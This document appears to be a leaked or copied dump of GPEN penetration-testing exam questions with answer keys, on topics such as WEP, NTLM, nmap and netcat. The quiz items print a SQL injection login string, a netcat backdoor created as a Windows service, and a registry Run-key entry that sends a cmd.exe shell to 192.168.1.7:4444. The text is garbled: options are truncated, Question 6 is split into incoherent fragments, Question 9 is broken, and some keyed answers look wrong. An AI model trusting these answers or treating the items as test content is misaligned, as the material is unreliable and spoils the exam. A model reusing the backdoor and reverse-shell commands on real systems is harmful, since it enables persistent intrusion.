How Many Questions Of GPEN Actual Test

NEW QUESTION 1

Which of the following are the countermeasures against WEP cracking? Each correct answer represents a part of the solution. Choose all that apply.

• A. Using a 16 bit SSI
• B. Changing keys ofte
• C. Using the longest key supported by hardwar
• D. Using a non-obvious ke

Answer: BCD

NEW QUESTION 2

Which of the following statements are true about NTLMv1?
Each correct answer represents a complete solution. Choose all that apply.

• A. It uses the LANMAN hash of the user's passwor
• B. It is mostly used when no Active Directory domain exist
• C. It is a challenge-response authentication protoco
• D. It uses the MD5 hash of the user's passwor

Answer: ABC

NEW QUESTION 3

Which of the following nmap switches is used to perform ICMP netmask scanning?

• A. -PM
• B. -PB
• C. -PI
• D. -PS

Answer: A

NEW QUESTION 4

John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. On the We-are-secure login page, he enters ='or''=' as a username and successfully logs in to the user page of the Web site. The We-are-secure login page is vulnerable to a __________.

• A. Replay attack
• B. Land attack
• C. SQL injection attack
• D. Dictionary attack

Answer: C

NEW QUESTION 5

John works as a professional Ethical Hacker. He is assigned a project to test the security of www.we-are-secure.com. He has to ping 500 computers to find out whether these computers are connected to the server or not. Which of the following will he use to ping these computers?

• A. PING
• B. TRACEROUTE
• C. Ping sweeping
• D. NETSTAT

Answer: C

NEW QUESTION 6

While reviewing traffic from a tcpdump capture, you notice the following commands being sent from a remote system to one of your web servers:
C:\>sc winternet.host.com create ncservicebinpath- "c:\tools\ncexe -I -p 2222 -e cmd.exe"
C:\>sc vJnternet.host.com query ncservice.
What is the intent of the commands?

• A. The first command creates a backdoor shell as a servic
• B. It is being started on TCP2222 using cmd.ex
• C. The second command verifies the service is created and itsstatu
• D. The first command creates a backdoor shell as a servic
• E. It is being started on UDP2222 using cmd.ex
• F. The second command verifies the service is created and itsstatu
• G. This creates a service called ncservice which is linked to the cmd.exe command andits designed to stop any instance of nc.exe being ru
• H. The second command verifiesthe service is created and its statu
• I. The first command verifies the service is created and its statu
• J. The secondcommand creates a backdoor shell as a servic
• K. It is being started on TCP 2222connected to cmd.ex

Answer: C

NEW QUESTION 7

Which of the following techniques are NOT used to perform active OS fingerprinting?
Each correct answer represents a complete solution. Choose all that apply.

• A. Analyzing email headers
• B. Sniffing and analyzing packets
• C. ICMP error message quoting
• D. Sending FIN packets to open ports on the remote system

Answer: AB

NEW QUESTION 8

John works as a Professional Ethical Hacker for we-are-secure Inc. The company is using a Wireless network. John has been assigned the work to check the security of WLAN of we-aresecure.
For this, he tries to capture the traffic, however, he does not find a good traffic to analyze data. He has already discovered the network using the ettercap tool. Which of the following tools can he use to generate traffic so that he can crack the Wep keys and enter into the network?

• A. ICMP ping flood tool
• B. Kismet
• C. Netstumbler
• D. AirSnort

Answer: A

NEW QUESTION 9

You successfully compromise a target system's web application using blind command injection. The command you injected is ping-n 1 192.168.1.200. Assuming your machine is

• A. Yes
• B. Not Mastered

Answer: A

NEW QUESTION 10

You suspect that a firewall or IPS exists between you and the target machine. Which nmap option will elicit responses from some firewalls and IPSs while being silently dropped by the target, thus confirming the existence of a firewall or IPS?

• A. –Traceroute
• B. –Firewalk
• C. –Badsum
• D. --SF

Answer: B

NEW QUESTION 11

You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t
REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.

• A. You want to put Netcat in the stealth mod
• B. You want to add the Netcat command to the Windows registr
• C. You want to perform banner grabbin
• D. You want to set the Netcat to execute command any tim

Answer: ABD

NEW QUESTION 12

You are using the dsniff tool to intercept communications between two entities and establish credentials with both sides of the connections. These entities do not notice that you were retrieving the information between these two. Which of the following attacks are you performing?

• A. Man-in-the-middle
• B. ARP poisoning
• C. Session hijacking
• D. DoS

Answer: A

NEW QUESTION 13

You suspect that system administrators In one part of the target organization are turning off their systems during the times when penetration tests are scheduled, what feature could you add to the ' Rules of engagement' that could help your team test that part of the target organization?

• A. Un announced test
• B. Tell response personnel the exact lime the test will occur
• C. Test systems after normal business hours
• D. Limit tests to business hours

Answer: C

NEW QUESTION 14

You want to retrieve password files (stored in the Web server's index directory) from various Web sites. Which of the following tools can you use to accomplish the task?

• A. Sam spade
• B. Nmap
• C. Whois
• D. Google

Answer: D

NEW QUESTION 15

Adam, a malicious hacker, hides a hacking tool from a system administrator of his company by using Alternate Data Streams (ADS) feature. Which of the following statements is true in context with the above scenario?

• A. Adam is using NTFS file syste
• B. Alternate Data Streams is a feature of Linux operating syste
• C. Adam is using FAT file syste
• D. Adam's system runs on Microsoft Windows 98 operating syste

Answer: A

NEW QUESTION 16

Which of the following is a tool for SSH and SSL MITM attacks?

• A. Ettercap
• B. Cain
• C. Dsniff
• D. AirJack

Answer: C

NEW QUESTION 17

What happens when you scan a broadcast IP address of a network?
Each correct answer represents a complete solution. Choose all that apply.

• A. It leads to scanning of all the IP addresses on that subnet at the same tim
• B. It will show an error in the scanning proces
• C. It may show smurf DoS attack in the network IDS of the victi
• D. Scanning of the broadcast IP address cannot be performe

Answer: AC

NEW QUESTION 18

You have been contracted to penetration test an e-mail server for a client that wants to know for sure if the sendmail service is vulnerable to any known attacks. You have permission to run any type of test, how will you proceed to give the client the most valid answer?

• A. Run all known sendmail exploits against the server and see if you can compromisethe service, even if it crashed the machine or service
• B. Run a banner grabbing vulnerability checker to determine the sendmail version andpatch level, then look up and report all the vulnerabilities that exist for that versionand patch level
• C. Run all sendmail exploits that will not crash the server and see if you cancompromise the service
• D. Log into the e-mail and determine the sendmail version and patch level, then lookup and report all the vulnerabilities that exist for that version and patch level

Answer: C

NEW QUESTION 19
......